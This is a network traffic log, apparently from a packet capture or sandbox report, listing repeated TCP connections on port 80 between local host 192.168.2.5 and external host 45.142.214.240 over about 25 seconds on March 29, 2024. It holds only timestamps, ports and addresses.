Mar 29, 2024 12:10:07.739217043 CET  80           49740      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:07.818260908 CET  80           49740      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:07.818370104 CET  49740        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.936367035 CET  49740        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:07.936772108 CET  49741        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.153054953 CET  80           49741      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:08.153141022 CET  49741        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.153311014 CET  49741        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.155771017 CET  80           49740      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:08.155833006 CET  49740        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.369599104 CET  80           49741      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:08.456115961 CET  80           49741      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:08.456176996 CET  49741        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.576699972 CET  49741        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.577092886 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.793119907 CET  80           49741      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:08.793235064 CET  49741        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.794408083 CET  80           49742      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:08.794507027 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:08.794656038 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.012204885 CET  80           49742      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:09.091121912 CET  80           49742      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:09.091188908 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.201668024 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.419344902 CET  80           49742      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:09.503828049 CET  80           49742      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:09.504067898 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.623562098 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.623859882 CET  49744        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.841464996 CET  80           49742      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:09.841592073 CET  49742        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.844542027 CET  80           49744      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:09.844660044 CET  49744        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:09.844841957 CET  49744        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.065243959 CET  80           49744      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:10.152059078 CET  80           49744      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:10.152296066 CET  49744        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.264445066 CET  49744        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.264734983 CET  49746        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.485019922 CET  80           49744      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:10.485085011 CET  49744        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.485205889 CET  80           49746      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:10.485279083 CET  49746        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.485513926 CET  49746        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.706059933 CET  80           49746      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:10.786386013 CET  80           49746      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:10.786448002 CET  49746        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.943983078 CET  49746        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:10.944288969 CET  49747        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.166976929 CET  80           49746      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:11.167211056 CET  80           49747      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:11.167455912 CET  49747        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.167462111 CET  49746        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.167851925 CET  49747        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.391628027 CET  80           49747      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:11.476926088 CET  80           49747      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:11.476986885 CET  49747        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.633600950 CET  49747        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.633935928 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.855937958 CET  80           49747      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:11.855957031 CET  80           49748      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:11.856033087 CET  49747        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:11.856102943 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:13.038892984 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:13.259691000 CET  80           49748      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:13.344556093 CET  80           49748      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:13.344646931 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:13.452003956 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:13.673362970 CET  80           49748      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:13.752072096 CET  80           49748      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:13.752135992 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:13.873831987 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:13.874262094 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:14.093605995 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:14.093792915 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:14.094012976 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:14.095326900 CET  80           49748      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:14.095403910 CET  49748        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:14.313138962 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:14.401448965 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:14.401762962 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:14.514655113 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:14.733381987 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:14.812182903 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:14.812269926 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:14.920798063 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.139754057 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:15.224502087 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:15.224699020 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.348759890 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.349081993 CET  49750        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.567553997 CET  80           49749      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:15.567858934 CET  49749        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.568197966 CET  80           49750      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:15.568289995 CET  49750        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.568464041 CET  49750        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.787851095 CET  80           49750      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:15.867146969 CET  80           49750      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:15.867311954 CET  49750        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.982625961 CET  49750        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:15.982877016 CET  49751        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.200537920 CET  80           49751      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:16.200653076 CET  49751        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.200825930 CET  49751        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.202022076 CET  80           49750      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:16.202086926 CET  49750        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.418442965 CET  80           49751      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:16.509687901 CET  80           49751      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:16.509857893 CET  49751        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.623519897 CET  49751        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.624059916 CET  49752        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.841202974 CET  80           49751      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:16.841357946 CET  80           49752      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:16.841404915 CET  49751        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.841445923 CET  49752        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:16.841602087 CET  49752        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.059389114 CET  80           49752      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:17.147675991 CET  80           49752      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:17.147735119 CET  49752        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.263680935 CET  49752        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.263961077 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.480971098 CET  80           49752      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:17.481070995 CET  49752        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.483086109 CET  80           49753      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:17.483165979 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.483335018 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.702534914 CET  80           49753      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:17.791408062 CET  80           49753      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:17.791470051 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:17.904398918 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.123821020 CET  80           49753      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:18.211899042 CET  80           49753      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:18.212111950 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.326658010 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.326983929 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.543277979 CET  80           49754      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:18.543380976 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.543549061 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.546004057 CET  80           49753      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:18.546077013 CET  49753        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.759912014 CET  80           49754      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:18.839035034 CET  80           49754      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:18.839135885 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:18.951435089 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:19.167771101 CET  80           49754      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:19.252229929 CET  80           49754      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:19.252336979 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:19.373157978 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:19.373470068 CET  49755        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:19.589612007 CET  80           49754      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:19.589678049 CET  49754        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:19.594391108 CET  80           49755      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:19.594460964 CET  49755        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:19.594654083 CET  49755        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:19.815176010 CET  80           49755      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:19.894037962 CET  80           49755      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:19.894151926 CET  49755        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.013793945 CET  49755        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.014177084 CET  49756        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.231689930 CET  80           49756      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:20.231790066 CET  49756        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.232000113 CET  49756        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.234527111 CET  80           49755      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:20.234623909 CET  49755        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.449779987 CET  80           49756      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:20.537019014 CET  80           49756      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:20.537218094 CET  49756        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.654548883 CET  49756        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.654853106 CET  49757        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.872246027 CET  80           49756      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:20.872342110 CET  49756        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.874013901 CET  80           49757      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:20.874089003 CET  49757        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:20.874262094 CET  49757        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.095848083 CET  80           49757      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:21.181425095 CET  80           49757      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:21.181495905 CET  49757        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.296174049 CET  49757        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.296531916 CET  49758        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.515415907 CET  80           49757      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:21.515611887 CET  49757        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.518863916 CET  80           49758      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:21.518944025 CET  49758        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.519109011 CET  49758        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.741599083 CET  80           49758      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:21.820341110 CET  80           49758      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:21.820511103 CET  49758        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.935977936 CET  49758        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:21.936419964 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:22.152801037 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:22.152995110 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:22.153074980 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:22.158309937 CET  80           49758      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:22.158380032 CET  49758        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:22.369441032 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:22.468333006 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:22.468389034 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:22.576565981 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:22.792892933 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:22.871659040 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:22.871745110 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:22.983299971 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:23.200666904 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:23.284241915 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:23.284321070 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:23.404393911 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:23.404670954 CET  49760        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:23.622090101 CET  80           49759      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:23.622140884 CET  49759        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:23.628534079 CET  80           49760      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:23.628604889 CET  49760        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:23.628742933 CET  49760        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:23.850963116 CET  80           49760      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:23.929877043 CET  80           49760      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:23.929960012 CET  49760        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.045567989 CET  49760        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.045874119 CET  49761        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.266798019 CET  80           49761      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:24.266993999 CET  49761        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.267148018 CET  49761        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.271533012 CET  80           49760      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:24.271596909 CET  49760        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.484505892 CET  80           49761      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:24.576252937 CET  80           49761      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:24.576503038 CET  49761        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.688211918 CET  49761        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:24.905628920 CET  80           49761      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:24.984981060 CET  80           49761      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:24.985047102 CET  49761        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:25.092185020 CET  49761        80         192.168.2.5     45.142.214.240
Mar 29, 2024 12:10:25.309631109 CET  80           49761      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:25.394243956 CET  80           49761      45.142.214.240  192.168.2.5
Mar 29, 2024 12:10:25.394308090 CET  49761        80         192.168.2.5     45.142.214.240
                                                                          Mar 29, 2024 12:10:25.514123917 CET4976180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.514385939 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.732007027 CET804976145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:25.732095957 CET4976180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.733804941 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:25.733885050 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.734046936 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:25.953242064 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.032165051 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.032365084 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.142226934 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.362057924 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.447014093 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.447113991 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.561290979 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.561569929 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.780551910 CET804976245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.780653954 CET4976280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.780754089 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:26.780832052 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:26.780978918 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.000169992 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.079746008 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.079802036 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.201584101 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.201946020 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.420919895 CET804976345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.420994043 CET4976380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.421180010 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.421272039 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.424287081 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.643404961 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.727524042 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:27.727580070 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.842602015 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:27.842865944 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.061912060 CET804976445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.062099934 CET4976480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.062119961 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.062206030 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.062365055 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.284079075 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.365735054 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.365848064 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.482736111 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.483077049 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.702282906 CET804976545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.702368021 CET4976580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.703574896 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:28.703646898 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.703816891 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:28.924356937 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.002948999 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.003010988 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.123661041 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.124099016 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.343473911 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.343734980 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.343836069 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.344305992 CET804976645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.344368935 CET4976680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.563002110 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.647773981 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.647958994 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.764532089 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.764869928 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.982435942 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.982701063 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.982779026 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:29.983849049 CET804976745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:29.983918905 CET4976780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.200531006 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.285660028 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.285789013 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.404975891 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.405420065 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.622684002 CET804976845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.622752905 CET4976880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.625096083 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.625186920 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.625360012 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:30.844969034 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.924068928 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:30.924215078 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.046070099 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.046402931 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.266392946 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.266416073 CET804976945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.266520977 CET4976980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.266537905 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.266789913 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.486053944 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.580327988 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.580431938 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.701837063 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.702159882 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.919930935 CET804977145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.920028925 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.920222044 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:31.921272993 CET804977045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:31.921350002 CET4977080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.137753010 CET804977145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.222223997 CET804977145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:32.222385883 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.346318007 CET4977180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.347337008 CET4977280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:32.563954115 CET804977145.142.214.240192.168.2.5
